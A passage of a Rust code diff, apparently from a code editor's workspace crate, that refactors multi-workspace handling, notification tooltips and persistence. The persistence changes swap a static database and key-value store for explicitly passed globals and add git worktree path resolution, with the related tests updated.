+ workspace.set_workspace_sidebar_open(false, has_notifications, show_toggle, cx);
+ workspace.set_sidebar_focus_handle(None);
});
}
let pane = self.workspace().read(cx).active_pane().clone();
@@ -318,10 +330,6 @@ impl MultiWorkspace {
.detach();
}
- pub fn is_sidebar_open(&self) -> bool {
- self.sidebar_open
- }
-
pub fn workspace(&self) -> &Entity<Workspace> {
&self.workspaces[self.active_workspace_index]
}
@@ -372,8 +380,12 @@ impl MultiWorkspace {
index
} else {
if self.sidebar_open {
+ let sidebar_focus_handle = self.sidebar.as_ref().map(|s| s.focus_handle(cx));
+ let has_notifications = self.sidebar_has_notifications(cx);
+ let show_toggle = self.multi_workspace_enabled(cx);
workspace.update(cx, |workspace, cx| {
- workspace.set_workspace_sidebar_open(true, cx);
+ workspace.set_workspace_sidebar_open(true, has_notifications, show_toggle, cx);
+ workspace.set_sidebar_focus_handle(sidebar_focus_handle);
});
}
Self::subscribe_to_workspace(&workspace, cx);
@@ -399,22 +411,27 @@ impl MultiWorkspace {
cx.notify();
}
- pub fn activate_next_workspace(&mut self, window: &mut Window, cx: &mut Context<Self>) {
- if self.workspaces.len() > 1 {
- let next_index = (self.active_workspace_index + 1) % self.workspaces.len();
- self.activate_index(next_index, window, cx);
+ fn cycle_workspace(&mut self, delta: isize, window: &mut Window, cx: &mut Context<Self>) {
+ let count = self.workspaces.len() as isize;
+ if count <= 1 {
+ return;
}
+ let current = self.active_workspace_index as isize;
+ let next = ((current + delta).rem_euclid(count)) as usize;
+ self.activate_index(next, window, cx);
}
- pub fn activate_previous_workspace(&mut self, window: &mut Window, cx: &mut Context<Self>) {
- if self.workspaces.len() > 1 {
- let prev_index = if self.active_workspace_index == 0 {
- self.workspaces.len() - 1
- } else {
- self.active_workspace_index - 1
- };
- self.activate_index(prev_index, window, cx);
- }
+ fn next_workspace(&mut self, _: &NextWorkspace, window: &mut Window, cx: &mut Context<Self>) {
+ self.cycle_workspace(1, window, cx);
+ }
+
+ fn previous_workspace(
+ &mut self,
+ _: &PreviousWorkspace,
+ window: &mut Window,
+ cx: &mut Context<Self>,
+ ) {
+ self.cycle_workspace(-1, window, cx);
}
fn serialize(&mut self, cx: &mut App) {
@@ -423,8 +440,9 @@ impl MultiWorkspace {
active_workspace_id: self.workspace().read(cx).database_id(),
sidebar_open: self.sidebar_open,
};
+ let kvp = db::kvp::KeyValueStore::global(cx);
self._serialize_task = Some(cx.background_spawn(async move {
- crate::persistence::write_multi_workspace_state(window_id, state).await;
+ crate::persistence::write_multi_workspace_state(&kvp, window_id, state).await;
}));
}
@@ -440,9 +458,6 @@ impl MultiWorkspace {
if let Some(task) = self._serialize_task.take() {
tasks.push(task);
}
- if let Some(task) = self._create_task.take() {
- tasks.push(task);
- }
tasks.extend(std::mem::take(&mut self.pending_removal_tasks));
async move {
@@ -545,15 +560,10 @@ impl MultiWorkspace {
}
pub fn take_pending_removal_tasks(&mut self) -> Vec<Task<()>> {
- let mut tasks: Vec<Task<()>> = std::mem::take(&mut self.pending_removal_tasks)
+ let tasks: Vec<Task<()>> = std::mem::take(&mut self.pending_removal_tasks)
.into_iter()
.filter(|task| !task.is_ready())
.collect();
- if let Some(task) = self._create_task.take() {
- if !task.is_ready() {
- tasks.push(task);
- }
- }
tasks
}
@@ -582,10 +592,12 @@ impl MultiWorkspace {
workspace
}
- pub fn create_workspace(&mut self, window: &mut Window, cx: &mut Context<Self>) {
- if !self.multi_workspace_enabled(cx) {
- return;
- }
+ #[cfg(any(test, feature = "test-support"))]
+ pub fn create_test_workspace(
+ &mut self,
+ window: &mut Window,
+ cx: &mut Context<Self>,
+ ) -> Task<()> {
let app_state = self.workspace().read(cx).app_state().clone();
let project = Project::local(
app_state.client.clone(),
@@ -602,58 +614,38 @@ impl MultiWorkspace {
self.focus_active_workspace(window, cx);
let weak_workspace = new_workspace.downgrade();
- self._create_task = Some(cx.spawn_in(window, async move |this, cx| {
- let result = crate::persistence::DB.next_id().await;
- this.update_in(cx, |this, window, cx| match result {
- Ok(workspace_id) => {
- if let Some(workspace) = weak_workspace.upgrade() {
- let session_id = workspace.read(cx).session_id();
- let window_id = window.window_handle().window_id().as_u64();
- workspace.update(cx, |workspace, _cx| {
- workspace.set_database_id(workspace_id);
- });
- cx.background_spawn(async move {
- crate::persistence::DB
- .set_session_binding(workspace_id, session_id, Some(window_id))
- .await
- .log_err();
- })
- .detach();
- } else {
- cx.background_spawn(async move {
- crate::persistence::DB
- .delete_workspace_by_id(workspace_id)
- .await
- .log_err();
- })
- .detach();
- }
- this.serialize(cx);
- }
- Err(error) => {
- log::error!("Failed to create workspace: {error:#}");
- if let Some(index) = weak_workspace
- .upgrade()
- .and_then(|w| this.workspaces.iter().position(|ws| *ws == w))
- {
- this.remove_workspace(index, window, cx);
- }
- this.workspace().update(cx, |workspace, cx| {
- let id = NotificationId::unique::<MultiWorkspace>();
- workspace.show_toast(
- Toast::new(id, format!("Failed to create workspace: {error}")),
- cx,
- );
+ let db = crate::persistence::WorkspaceDb::global(cx);
+ cx.spawn_in(window, async move |this, cx| {
+ let workspace_id = db.next_id().await.unwrap();
+ let workspace = weak_workspace.upgrade().unwrap();
+ let task: Task<()> = this
+ .update_in(cx, |this, window, cx| {
+ let session_id = workspace.read(cx).session_id();
+ let window_id = window.window_handle().window_id().as_u64();
+ workspace.update(cx, |workspace, _cx| {
+ workspace.set_database_id(workspace_id);
});
- }
- })
- .log_err();
- }));
+ this.serialize(cx);
+ let db = db.clone();
+ cx.background_spawn(async move {
+ db.set_session_binding(workspace_id, session_id, Some(window_id))
+ .await
+ .log_err();
+ })
+ })
+ .unwrap();
+ task.await
+ })
}
- pub fn remove_workspace(&mut self, index: usize, window: &mut Window, cx: &mut Context<Self>) {
+ pub fn remove_workspace(
+ &mut self,
+ index: usize,
+ window: &mut Window,
+ cx: &mut Context<Self>,
+ ) -> Option<Entity<Workspace>> {
if self.workspaces.len() <= 1 || index >= self.workspaces.len() {
- return;
+ return None;
}
let removed_workspace = self.workspaces.remove(index);
@@ -664,12 +656,24 @@ impl MultiWorkspace {
self.active_workspace_index -= 1;
}
+ // Clear session_id and cancel any in-flight serialization on the
+ // removed workspace. Without this, a pending throttle timer from
+ // `serialize_workspace` could fire and write the old session_id
+ // back to the DB, resurrecting the workspace on next launch.
+ removed_workspace.update(cx, |workspace, _cx| {
+ workspace.session_id.take();
+ workspace._schedule_serialize_workspace.take();
+ workspace._serialize_workspace_task.take();
+ });
+
if let Some(workspace_id) = removed_workspace.read(cx).database_id() {
+ let db = crate::persistence::WorkspaceDb::global(cx);
self.pending_removal_tasks.retain(|task| !task.is_ready());
self.pending_removal_tasks
.push(cx.background_spawn(async move {
- crate::persistence::DB
- .delete_workspace_by_id(workspace_id)
+ // Clear the session binding instead of deleting the row so
+ // the workspace still appears in the recent-projects list.
+ db.set_session_binding(workspace_id, None, None)
.await
.log_err();
}));
@@ -682,6 +686,49 @@ impl MultiWorkspace {
));
cx.emit(MultiWorkspaceEvent::ActiveWorkspaceChanged);
cx.notify();
+
+ Some(removed_workspace)
+ }
+
+ pub fn move_workspace_to_new_window(
+ &mut self,
+ index: usize,
+ window: &mut Window,
+ cx: &mut Context<Self>,
+ ) {
+ if self.workspaces.len() <= 1 || index >= self.workspaces.len() {
+ return;
+ }
+
+ let Some(workspace) = self.remove_workspace(index, window, cx) else {
+ return;
+ };
+
+ let app_state: Arc<crate::AppState> = workspace.read(cx).app_state().clone();
+
+ cx.defer(move |cx| {
+ let options = (app_state.build_window_options)(None, cx);
+
+ let Ok(window) = cx.open_window(options, |window, cx| {
+ cx.new(|cx| MultiWorkspace::new(workspace, window, cx))
+ }) else {
+ return;
+ };
+
+ let _ = window.update(cx, |_, window, _| {
+ window.activate_window();
+ });
+ });
+ }
+
+ fn move_active_workspace_to_new_window(
+ &mut self,
+ _: &MoveWorkspaceToNewWindow,
+ window: &mut Window,
+ cx: &mut Context<Self>,
+ ) {
+ let index = self.active_workspace_index;
+ self.move_workspace_to_new_window(index, window, cx);
}
pub fn open_project(
@@ -689,7 +736,7 @@ impl MultiWorkspace {
paths: Vec<PathBuf>,
window: &mut Window,
cx: &mut Context<Self>,
- ) -> Task<Result<()>> {
+ ) -> Task<Result<Entity<Workspace>>> {
let workspace = self.workspace().clone();
if self.multi_workspace_enabled(cx) {
@@ -710,7 +757,7 @@ impl MultiWorkspace {
})?
.await
} else {
- Ok(())
+ Ok(workspace)
}
})
}
@@ -721,7 +768,7 @@ impl Render for MultiWorkspace {
fn render(&mut self, window: &mut Window, cx: &mut Context<Self>) -> impl IntoElement {
let multi_workspace_enabled = self.multi_workspace_enabled(cx);
- let sidebar: Option<AnyElement> = if multi_workspace_enabled && self.sidebar_open {
+ let sidebar: Option<AnyElement> = if multi_workspace_enabled && self.sidebar_open() {
self.sidebar.as_ref().map(|sidebar_handle| {
let weak = cx.weak_entity();
@@ -784,32 +831,25 @@ impl Render for MultiWorkspace {
.font(ui_font)
.text_color(text_color)
.on_action(cx.listener(Self::close_window))
- .on_action(
- cx.listener(|this: &mut Self, _: &NewWorkspaceInWindow, window, cx| {
- this.create_workspace(window, cx);
- }),
- )
- .on_action(
- cx.listener(|this: &mut Self, _: &NextWorkspaceInWindow, window, cx| {
- this.activate_next_workspace(window, cx);
- }),
- )
- .on_action(cx.listener(
- |this: &mut Self, _: &PreviousWorkspaceInWindow, window, cx| {
- this.activate_previous_workspace(window, cx);
- },
- ))
.when(self.multi_workspace_enabled(cx), |this| {
this.on_action(cx.listener(
|this: &mut Self, _: &ToggleWorkspaceSidebar, window, cx| {
this.toggle_sidebar(window, cx);
},
))
+ .on_action(cx.listener(
+ |this: &mut Self, _: &CloseWorkspaceSidebar, window, cx| {
+ this.close_sidebar_action(window, cx);
+ },
+ ))
.on_action(cx.listener(
|this: &mut Self, _: &FocusWorkspaceSidebar, window, cx| {
this.focus_sidebar(window, cx);
},
))
+ .on_action(cx.listener(Self::next_workspace))
+ .on_action(cx.listener(Self::previous_workspace))
+ .on_action(cx.listener(Self::move_active_workspace_to_new_window))
})
.when(
self.sidebar_open() && self.multi_workspace_enabled(cx),
@@ -837,7 +877,7 @@ impl Render for MultiWorkspace {
window,
cx,
Tiling {
- left: multi_workspace_enabled && self.sidebar_open,
+ left: multi_workspace_enabled && self.sidebar_open(),
..Tiling::default()
},
)
@@ -876,7 +916,7 @@ mod tests {
multi_workspace.update_in(cx, |mw, _window, cx| {
mw.open_sidebar(cx);
- assert!(mw.is_sidebar_open());
+ assert!(mw.sidebar_open());
});
cx.update(|_window, cx| {
@@ -886,7 +926,7 @@ mod tests {
multi_workspace.read_with(cx, |mw, cx| {
assert!(
- !mw.is_sidebar_open(),
+ !mw.sidebar_open(),
"Sidebar should be closed when disable_ai is true"
);
assert!(
@@ -900,7 +940,7 @@ mod tests {
});
multi_workspace.read_with(cx, |mw, _cx| {
assert!(
- !mw.is_sidebar_open(),
+ !mw.sidebar_open(),
"Sidebar should remain closed when toggled with disable_ai true"
);
});
@@ -916,7 +956,7 @@ mod tests {
"Multi-workspace should be enabled after re-enabling AI"
);
assert!(
- !mw.is_sidebar_open(),
+ !mw.sidebar_open(),
"Sidebar should still be closed after re-enabling AI (not auto-opened)"
);
});
@@ -926,7 +966,7 @@ mod tests {
});
multi_workspace.read_with(cx, |mw, _cx| {
assert!(
- mw.is_sidebar_open(),
+ mw.sidebar_open(),
"Sidebar should open when toggled after re-enabling AI"
);
});
@@ -234,6 +234,14 @@ impl Workspace {
self.suppressed_notifications.insert(id.clone());
}
+ pub fn is_notification_suppressed(&self, notification_id: NotificationId) -> bool {
+ self.suppressed_notifications.contains(¬ification_id)
+ }
+
+ pub fn unsuppress(&mut self, notification_id: NotificationId) {
+ self.suppressed_notifications.remove(¬ification_id);
+ }
+
pub fn show_initial_notifications(&mut self, cx: &mut Context<Self>) {
// Allow absence of the global so that tests don't need to initialize it.
let app_notifications = GLOBAL_APP_NOTIFICATIONS
@@ -657,15 +665,17 @@ impl RenderOnce for NotificationFrame {
IconButton::new(close_id, close_icon)
.tooltip(move |_window, cx| {
if suppress {
- Tooltip::for_action(
- "Suppress.\nClose with click.",
- &SuppressNotification,
+ Tooltip::with_meta(
+ "Suppress",
+ Some(&SuppressNotification),
+ "Click to Close",
cx,
)
} else if show_suppress_button {
- Tooltip::for_action(
- "Close.\nSuppress with shift-click.",
- &menu::Cancel,
+ Tooltip::with_meta(
+ "Close",
+ Some(&menu::Cancel),
+ "Shift-click to Suppress",
cx,
)
} else {
@@ -915,11 +925,11 @@ pub mod simple_message_notification {
}));
if let Some(icon) = self.primary_icon {
- button = button
- .icon(icon)
- .icon_color(self.primary_icon_color.unwrap_or(Color::Muted))
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::Small);
+ button = button.start_icon(
+ Icon::new(icon)
+ .size(IconSize::Small)
+ .color(self.primary_icon_color.unwrap_or(Color::Muted)),
+ );
}
button
@@ -935,11 +945,11 @@ pub mod simple_message_notification {
}));
if let Some(icon) = self.secondary_icon {
- button = button
- .icon(icon)
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::Small)
- .icon_color(self.secondary_icon_color.unwrap_or(Color::Muted));
+ button = button.start_icon(
+ Icon::new(icon)
+ .size(IconSize::Small)
+ .color(self.secondary_icon_color.unwrap_or(Color::Muted)),
+ );
}
button
@@ -953,9 +963,11 @@ pub mod simple_message_notification {
let url = url.clone();
Button::new(message.clone(), message.clone())
.label_size(LabelSize::Small)
- .icon(IconName::ArrowUpRight)
- .icon_size(IconSize::Indicator)
- .icon_color(Color::Muted)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::Indicator)
+ .color(Color::Muted),
+ )
.on_click(cx.listener(move |_, _, _, cx| {
cx.open_url(&url);
}))
@@ -3192,6 +3192,7 @@ impl Pane {
});
let entry_abs_path = pane.read(cx).entry_abs_path(entry, cx);
+ let reveal_path = entry_abs_path.clone();
let parent_abs_path = entry_abs_path
.as_deref()
.and_then(|abs_path| Some(abs_path.parent()?.to_path_buf()));
@@ -3201,6 +3202,15 @@ impl Pane {
let visible_in_project_panel = relative_path.is_some()
&& worktree.is_some_and(|worktree| worktree.read(cx).is_visible());
+ let is_local = pane.read(cx).project.upgrade().is_some_and(|project| {
+ let project = project.read(cx);
+ project.is_local() || project.is_via_wsl_with_host_interop(cx)
+ });
+ let is_remote = pane
+ .read(cx)
+ .project
+ .upgrade()
+ .is_some_and(|project| project.read(cx).is_remote());
let entry_id = entry.to_proto();
@@ -3233,8 +3243,26 @@ impl Pane {
}),
)
})
+ .when(is_local, |menu| {
+ menu.when_some(reveal_path, |menu, reveal_path| {
+ menu.separator().entry(
+ ui::utils::reveal_in_file_manager_label(is_remote),
+ Some(Box::new(
+ zed_actions::editor::RevealInFileManager,
+ )),
+ window.handler_for(&pane, move |pane, _, cx| {
+ if let Some(project) = pane.project.upgrade() {
+ project.update(cx, |project, cx| {
+ project.reveal_path(&reveal_path, cx);
+ });
+ } else {
+ cx.reveal_path(&reveal_path);
+ }
+ }),
+ )
+ })
+ })
.map(pin_tab_entries)
- .separator()
.when(visible_in_project_panel, |menu| {
menu.entry(
"Reveal In Project Panel",
@@ -14,7 +14,7 @@ use fs::Fs;
use anyhow::{Context as _, Result, bail};
use collections::{HashMap, HashSet, IndexSet};
use db::{
- kvp::KEY_VALUE_STORE,
+ kvp::KeyValueStore,
query,
sqlez::{connection::Connection, domain::Domain},
sqlez_macros::sql,
@@ -174,8 +174,8 @@ impl Column for SerializedWindowBounds {
const DEFAULT_WINDOW_BOUNDS_KEY: &str = "default_window_bounds";
-pub fn read_default_window_bounds() -> Option<(Uuid, WindowBounds)> {
- let json_str = KEY_VALUE_STORE
+pub fn read_default_window_bounds(kvp: &KeyValueStore) -> Option<(Uuid, WindowBounds)> {
+ let json_str = kvp
.read_kvp(DEFAULT_WINDOW_BOUNDS_KEY)
.log_err()
.flatten()?;
@@ -186,13 +186,13 @@ pub fn read_default_window_bounds() -> Option<(Uuid, WindowBounds)> {
}
pub async fn write_default_window_bounds(
+ kvp: &KeyValueStore,
bounds: WindowBounds,
display_uuid: Uuid,
) -> anyhow::Result<()> {
let persisted = WindowBoundsJson::from(bounds);
let json_str = serde_json::to_string(&(display_uuid, persisted))?;
- KEY_VALUE_STORE
- .write_kvp(DEFAULT_WINDOW_BOUNDS_KEY.to_string(), json_str)
+ kvp.write_kvp(DEFAULT_WINDOW_BOUNDS_KEY.to_string(), json_str)
.await?;
Ok(())
}
@@ -290,12 +290,9 @@ impl From<WindowBoundsJson> for WindowBounds {
}
}
-fn multi_workspace_states() -> db::kvp::ScopedKeyValueStore<'static> {
- KEY_VALUE_STORE.scoped("multi_workspace_state")
-}
-
-fn read_multi_workspace_state(window_id: WindowId) -> model::MultiWorkspaceState {
- multi_workspace_states()
+fn read_multi_workspace_state(window_id: WindowId, cx: &App) -> model::MultiWorkspaceState {
+ let kvp = KeyValueStore::global(cx);
+ kvp.scoped("multi_workspace_state")
.read(&window_id.as_u64().to_string())
.log_err()
.flatten()
@@ -303,9 +300,13 @@ fn read_multi_workspace_state(window_id: WindowId) -> model::MultiWorkspaceState
.unwrap_or_default()
}
-pub async fn write_multi_workspace_state(window_id: WindowId, state: model::MultiWorkspaceState) {
+pub async fn write_multi_workspace_state(
+ kvp: &KeyValueStore,
+ window_id: WindowId,
+ state: model::MultiWorkspaceState,
+) {
if let Ok(json_str) = serde_json::to_string(&state) {
- multi_workspace_states()
+ kvp.scoped("multi_workspace_state")
.write(window_id.as_u64().to_string(), json_str)
.await
.log_err();
@@ -314,6 +315,7 @@ pub async fn write_multi_workspace_state(window_id: WindowId, state: model::Mult
pub fn read_serialized_multi_workspaces(
session_workspaces: Vec<model::SessionWorkspace>,
+ cx: &App,
) -> Vec<model::SerializedMultiWorkspace> {
let mut window_groups: Vec<Vec<model::SessionWorkspace>> = Vec::new();
let mut window_id_to_group: HashMap<WindowId, usize> = HashMap::default();
@@ -338,7 +340,7 @@ pub fn read_serialized_multi_workspaces(
.map(|group| {
let window_id = group.first().and_then(|sw| sw.window_id);
let state = window_id
- .map(read_multi_workspace_state)
+ .map(|wid| read_multi_workspace_state(wid, cx))
.unwrap_or_default();
model::SerializedMultiWorkspace {
workspaces: group,
@@ -350,19 +352,18 @@ pub fn read_serialized_multi_workspaces(
const DEFAULT_DOCK_STATE_KEY: &str = "default_dock_state";
-pub fn read_default_dock_state() -> Option<DockStructure> {
- let json_str = KEY_VALUE_STORE
- .read_kvp(DEFAULT_DOCK_STATE_KEY)
- .log_err()
- .flatten()?;
+pub fn read_default_dock_state(kvp: &KeyValueStore) -> Option<DockStructure> {
+ let json_str = kvp.read_kvp(DEFAULT_DOCK_STATE_KEY).log_err().flatten()?;
serde_json::from_str::<DockStructure>(&json_str).ok()
}
-pub async fn write_default_dock_state(docks: DockStructure) -> anyhow::Result<()> {
+pub async fn write_default_dock_state(
+ kvp: &KeyValueStore,
+ docks: DockStructure,
+) -> anyhow::Result<()> {
let json_str = serde_json::to_string(&docks)?;
- KEY_VALUE_STORE
- .write_kvp(DEFAULT_DOCK_STATE_KEY.to_string(), json_str)
+ kvp.write_kvp(DEFAULT_DOCK_STATE_KEY.to_string(), json_str)
.await?;
Ok(())
}
@@ -980,7 +981,7 @@ impl Domain for WorkspaceDb {
}
}
-db::static_connection!(DB, WorkspaceDb, []);
+db::static_connection!(WorkspaceDb, []);
impl WorkspaceDb {
/// Returns a serialized workspace for the given worktree_roots. If the passed array
@@ -1783,11 +1784,17 @@ impl WorkspaceDb {
}
}
- async fn all_paths_exist_with_a_directory(paths: &[PathBuf], fs: &dyn Fs) -> bool {
+ async fn all_paths_exist_with_a_directory(
+ paths: &[PathBuf],
+ fs: &dyn Fs,
+ timestamp: Option<DateTime<Utc>>,
+ ) -> bool {
let mut any_dir = false;
for path in paths {
match fs.metadata(path).await.ok().flatten() {
- None => return false,
+ None => {
+ return timestamp.is_some_and(|t| Utc::now() - t < chrono::Duration::days(7));
+ }
Some(meta) => {
if meta.is_dir {
any_dir = true;
@@ -1843,7 +1850,9 @@ impl WorkspaceDb {
// If a local workspace points to WSL, this check will cause us to wait for the
// WSL VM and file server to boot up. This can block for many seconds.
// Supported scenarios use remote workspaces.
- if !has_wsl_path && Self::all_paths_exist_with_a_directory(paths.paths(), fs).await {
+ if !has_wsl_path
+ && Self::all_paths_exist_with_a_directory(paths.paths(), fs, Some(timestamp)).await
+ {
result.push((id, SerializedWorkspaceLocation::Local, paths, timestamp));
} else {
delete_tasks.push(self.delete_workspace_by_id(id));
@@ -1903,7 +1912,7 @@ impl WorkspaceDb {
window_id,
});
} else {
- if Self::all_paths_exist_with_a_directory(paths.paths(), fs).await {
+ if Self::all_paths_exist_with_a_directory(paths.paths(), fs, None).await {
workspaces.push(SessionWorkspace {
workspace_id,
location: SerializedWorkspaceLocation::Local,
@@ -2244,7 +2253,7 @@ impl WorkspaceDb {
use db::sqlez::statement::Statement;
use itertools::Itertools as _;
- DB.clear_trusted_worktrees()
+ self.clear_trusted_worktrees()
.await
.context("clearing previous trust state")?;
@@ -2311,7 +2320,7 @@ VALUES {placeholders};"#
}
pub fn fetch_trusted_worktrees(&self) -> Result<DbTrustedPaths> {
- let trusted_worktrees = DB.trusted_worktrees()?;
+ let trusted_worktrees = self.trusted_worktrees()?;
Ok(trusted_worktrees
.into_iter()
.filter_map(|(abs_path, user_name, host_name)| {
@@ -2350,6 +2359,86 @@ VALUES {placeholders};"#
}
}
+type WorkspaceEntry = (
+ WorkspaceId,
+ SerializedWorkspaceLocation,
+ PathList,
+ DateTime<Utc>,
+);
+
+/// Resolves workspace entries whose paths are git linked worktree checkouts
+/// to their main repository paths.
+///
+/// For each workspace entry:
+/// - If any path is a linked worktree checkout, all worktree paths in that
+/// entry are resolved to their main repository paths, producing a new
+/// `PathList`.
+/// - The resolved entry is then deduplicated against existing entries: if a
+/// workspace with the same paths already exists, the entry with the most
+/// recent timestamp is kept.
+pub async fn resolve_worktree_workspaces(
+ workspaces: impl IntoIterator<Item = WorkspaceEntry>,
+ fs: &dyn Fs,
+) -> Vec<WorkspaceEntry> {
+ // First pass: resolve worktree paths to main repo paths concurrently.
+ let resolved = futures::future::join_all(workspaces.into_iter().map(|entry| async move {
+ let paths = entry.2.paths();
+ if paths.is_empty() {
+ return entry;
+ }
+
+ // Resolve each path concurrently
+ let resolved_paths = futures::future::join_all(
+ paths
+ .iter()
+ .map(|path| project::git_store::resolve_git_worktree_to_main_repo(fs, path)),
+ )
+ .await;
+
+ // If no paths were resolved, this entry is not a worktree — keep as-is
+ if resolved_paths.iter().all(|r| r.is_none()) {
+ return entry;
+ }
+
+ // Build new path list, substituting resolved paths
+ let new_paths: Vec<PathBuf> = paths
+ .iter()
+ .zip(resolved_paths.iter())
+ .map(|(original, resolved)| {
+ resolved
+ .as_ref()
+ .cloned()
+ .unwrap_or_else(|| original.clone())
+ })
+ .collect();
+
+ let new_path_refs: Vec<&Path> = new_paths.iter().map(|p| p.as_path()).collect();
+ (entry.0, entry.1, PathList::new(&new_path_refs), entry.3)
+ }))
+ .await;
+
+ // Second pass: deduplicate by PathList.
+ // When two entries resolve to the same paths, keep the one with the
+ // more recent timestamp.
+ let mut seen: collections::HashMap<Vec<PathBuf>, usize> = collections::HashMap::default();
+ let mut result: Vec<WorkspaceEntry> = Vec::new();
+
+ for entry in resolved {
+ let key: Vec<PathBuf> = entry.2.paths().to_vec();
+ if let Some(&existing_idx) = seen.get(&key) {
+ // Keep the entry with the more recent timestamp
+ if entry.3 > result[existing_idx].3 {
+ result[existing_idx] = entry;
+ }
+ } else {
+ seen.insert(key, result.len());
+ result.push(entry);
+ }
+ }
+
+ result
+}
+
pub fn delete_unloaded_items(
alive_items: Vec<ItemId>,
workspace_id: WorkspaceId,
@@ -2393,6 +2482,14 @@ mod tests {
use serde_json::json;
use std::{thread, time::Duration};
+ /// Creates a unique directory in a FakeFs, returning the path.
+ /// Uses a UUID suffix to avoid collisions with other tests sharing the global DB.
+ async fn unique_test_dir(fs: &fs::FakeFs, prefix: &str) -> PathBuf {
+ let dir = PathBuf::from(format!("/test-dirs/{}-{}", prefix, uuid::Uuid::new_v4()));
+ fs.insert_tree(&dir, json!({})).await;
+ dir
+ }
+
#[gpui::test]
async fn test_multi_workspace_serializes_on_add_and_remove(cx: &mut gpui::TestAppContext) {
use crate::multi_workspace::MultiWorkspace;
@@ -2434,7 +2531,7 @@ mod tests {
cx.run_until_parked();
// Read back the persisted state and check that the active workspace ID was written.
- let state_after_add = read_multi_workspace_state(window_id);
+ let state_after_add = cx.update(|_, cx| read_multi_workspace_state(window_id, cx));
let active_workspace2_db_id = workspace2.read_with(cx, |ws, _| ws.database_id());
assert_eq!(
state_after_add.active_workspace_id, active_workspace2_db_id,
@@ -2449,7 +2546,7 @@ mod tests {
cx.run_until_parked();
- let state_after_remove = read_multi_workspace_state(window_id);
+ let state_after_remove = cx.update(|_, cx| read_multi_workspace_state(window_id, cx));
let remaining_db_id =
multi_workspace.read_with(cx, |mw, cx| mw.workspace().read(cx).database_id());
assert_eq!(
@@ -3866,14 +3963,17 @@ mod tests {
}
#[gpui::test]
- async fn test_read_serialized_multi_workspaces_with_state() {
+ async fn test_read_serialized_multi_workspaces_with_state(cx: &mut gpui::TestAppContext) {
use crate::persistence::model::MultiWorkspaceState;
// Write multi-workspace state for two windows via the scoped KVP.
let window_10 = WindowId::from(10u64);
let window_20 = WindowId::from(20u64);
+ let kvp = cx.update(|cx| KeyValueStore::global(cx));
+
write_multi_workspace_state(
+ &kvp,
window_10,
MultiWorkspaceState {
active_workspace_id: Some(WorkspaceId(2)),
@@ -3883,6 +3983,7 @@ mod tests {
.await;
write_multi_workspace_state(
+ &kvp,
window_20,
MultiWorkspaceState {
active_workspace_id: Some(WorkspaceId(3)),
@@ -3919,7 +4020,7 @@ mod tests {
},
];
- let results = read_serialized_multi_workspaces(session_workspaces);
+ let results = cx.update(|cx| read_serialized_multi_workspaces(session_workspaces, cx));
// Should produce 3 groups: window 10, window 20, and the orphan.
assert_eq!(results.len(), 3);
@@ -3965,14 +4066,16 @@ mod tests {
let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone());
+ let db = cx.update(|_, cx| WorkspaceDb::global(cx));
+
// Assign a database_id so serialization will actually persist.
- let workspace_id = DB.next_id().await.unwrap();
+ let workspace_id = db.next_id().await.unwrap();
workspace.update(cx, |ws, _cx| {
ws.set_database_id(workspace_id);
});
// Mutate some workspace state.
- DB.set_centered_layout(workspace_id, true).await.unwrap();
+ db.set_centered_layout(workspace_id, true).await.unwrap();
// Call flush_serialization and await the returned task directly
// (without run_until_parked — the point is that awaiting the task
@@ -3984,7 +4087,7 @@ mod tests {
task.await;
// Read the workspace back from the DB and verify serialization happened.
- let serialized = DB.workspace_for_id(workspace_id);
+ let serialized = db.workspace_for_id(workspace_id);
assert!(
serialized.is_some(),
"flush_serialization should have persisted the workspace to DB"
@@ -3992,9 +4095,7 @@ mod tests {
}
#[gpui::test]
- async fn test_create_workspace_serializes_active_workspace_id_after_db_id_assigned(
- cx: &mut gpui::TestAppContext,
- ) {
+ async fn test_create_workspace_serialization(cx: &mut gpui::TestAppContext) {
use crate::multi_workspace::MultiWorkspace;
use crate::persistence::read_multi_workspace_state;
use feature_flags::FeatureFlagAppExt;
@@ -4024,73 +4125,32 @@ mod tests {
// Create a new workspace via the MultiWorkspace API (triggers next_id()).
multi_workspace.update_in(cx, |mw, window, cx| {
- mw.create_workspace(window, cx);
+ mw.create_test_workspace(window, cx).detach();
});
// Let the async next_id() and re-serialization tasks complete.
cx.run_until_parked();
- // Read back the multi-workspace state.
- let state = read_multi_workspace_state(window_id);
-
- // The new workspace should now have a database_id, and the multi-workspace
- // state should record it as the active workspace.
+ // The new workspace should now have a database_id.
let new_workspace_db_id =
multi_workspace.read_with(cx, |mw, cx| mw.workspace().read(cx).database_id());
assert!(
new_workspace_db_id.is_some(),
"New workspace should have a database_id after run_until_parked"
);
+
+ // The multi-workspace state should record it as the active workspace.
+ let state = cx.update(|_, cx| read_multi_workspace_state(window_id, cx));
assert_eq!(
state.active_workspace_id, new_workspace_db_id,
"Serialized active_workspace_id should match the new workspace's database_id"
);
- }
-
- #[gpui::test]
- async fn test_create_workspace_individual_serialization(cx: &mut gpui::TestAppContext) {
- use crate::multi_workspace::MultiWorkspace;
- use feature_flags::FeatureFlagAppExt;
-
- use project::Project;
-
- crate::tests::init_test(cx);
-
- cx.update(|cx| {
- cx.set_staff(true);
- cx.update_flags(true, vec!["agent-v2".to_string()]);
- });
-
- let fs = fs::FakeFs::new(cx.executor());
- let project = Project::test(fs.clone(), [], cx).await;
-
- let (multi_workspace, cx) =
- cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
-
- multi_workspace.update_in(cx, |mw, _, cx| {
- mw.set_random_database_id(cx);
- });
-
- // Create a new workspace.
- multi_workspace.update_in(cx, |mw, window, cx| {
- mw.create_workspace(window, cx);
- });
-
- cx.run_until_parked();
-
- // Get the new workspace's database_id.
- let new_db_id =
- multi_workspace.read_with(cx, |mw, cx| mw.workspace().read(cx).database_id());
- assert!(
- new_db_id.is_some(),
- "New workspace should have a database_id"
- );
-
- let workspace_id = new_db_id.unwrap();
- // The workspace should have been serialized to the DB with real data
+ // The individual workspace row should exist with real data
// (not just the bare DEFAULT VALUES row from next_id).
- let serialized = DB.workspace_for_id(workspace_id);
+ let workspace_id = new_workspace_db_id.unwrap();
+ let db = cx.update(|_, cx| WorkspaceDb::global(cx));
+ let serialized = db.workspace_for_id(workspace_id);
assert!(
serialized.is_some(),
"Newly created workspace should be fully serialized in the DB after database_id assignment"
